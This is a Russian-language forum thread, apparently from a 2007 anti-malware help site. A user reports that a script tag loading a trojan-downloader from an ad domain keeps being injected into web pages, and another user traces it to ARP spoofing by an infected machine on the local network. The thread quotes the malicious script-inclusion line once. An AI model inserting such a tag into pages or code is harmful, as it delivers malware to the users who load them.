Добрый день!
В течении последних 3 дней, при открытии страниц, антивирус ругается:
Вредоносный HTTP-объект <ads.adslooks.info/ads.js>: обнаружено: троянская программа 'Trojan-Downloader.JS.Agent.agx'
Антивирус успешно блокирует скрипт.
Ругается не постоянно, а периодически в течении дня. Соответственно коде страниц появляется вставка скрипта:
Длится это минут 10-20 потом прекращается на некоторое время.
Страницы чистые 100%. наблюдалось на страницых яндекса, гугля и т.п.
Зараженность компьютера тоже можно исключить на 90%, т.к. полная проверка антивирусом, с последними обновлениями, ничего не выявила. Также была произведена переустановка системы с полным форматированием. На чистую системы был установлен только антивирус. Ситуация не изменилась.
Единственное оставшееся предположение, что вставка кода осуществляется на стороне провайдера.
Собственно вопрос в том, так ли это и надо предъявлять претензии провайдеру или возможны еще варианты?
Будь в курсе!Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Страничка эта Ваша? система ads.adslooks - банеры, которые крутятся на страничке.
если страница не Ваша, то лучше на нее пока не ходить, и написать хостеру о вирусах на странице.
Для этого раздела надо выполять Правила и прикреплять логи с компьютера, иначе разговора не получится.
Павел AVZ HijackThis помощь с 10-00 до 18-00МСК
Windows7, SEP(work)
WindowsXP KIS(home) На up не реагирую
Страничка http://ads.adslooks.info не моя.
Этот код <SCRIPT LANGUAGE="javascript1.2"
SRC="http://ads.adslooks.info/ads.js"></SCRIPT> периодически вставляется в начало всех открываемых мной страниц.
Прикрепить логи в данный момент не могу, так как пишу с рабочего компьютера, а описанная ситуация наблюдается на домашнем. Вечером постараюсь сделать все по инструкции.
Меня вобщем интересовал вопрос, возможно ли что код вставляется где-то на пути от веб серверов до моего компьютера?
районная сеть, инет вроде без прокси... по крайней мере настроек прокси в эксплорере нет.
Подобная ситуация по крайней мере еще у одного пользователя нашей сети. Он пытался обратится к админам сети, ответом было что-то типа "... кто-то сканирует сеть, поставьте файервол"
Я конечно не очень разбираюсь в вопросе, но мне кажется админам вклиниться в трафик большого труда не составит, а вот чтоб какойто пользователь сети смог так запросто это сделать...
Последний раз редактировалось bormok; 03.12.2007 в 12:17.
Как я писал выше, я сделал форматирование диска, поставил заново систему и антивирь, но все равно появляется этот код...
Сейчас поеду домой и сделаю еще проверку по инструкции.
на письмо ответа нет... на форуме провайдера пока начинается все с начала... проверьте антивирусом, переустановите винду и т.п.
наконец-то нашел товарисчей по несчастью http://forum.kaspersky.com/index.php?showtopic=54300
прям эпидемия масштаба города...
Наткнулся на этот форум и обрадовался, что не один. Проблема с ads.adslooks.info, а до этого аналогичная с fly.1234214.info возникает, когда кто-нибудь в локалке цепляет вирус (пока не нашел какой, т.к. стоит глубокая ночь и хозяева зараженного компа спят). Этот комп подменяет в arp таблицах роутера и локальных компов мак-адреса на свой и спокойненько перехватывает трафик http и вставляет скрипт. При этом не важно через прокси или напрямую осуществляется выход в инет. Я просто заблокировал зараженый комп на рутере и перегрузил его (рутер). Все сразу излечилось.
Зараза идет из Китая. Известны случаи в Норильске и Красноярске.
P.S. Большая просьба выложить это на форум, а то у меня не хватает прав, а разбираться - вломы.
Уважаемый(ая) bormok, наши специалисты оказали Вам всю возможную помощь по вашему обращению.
В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru: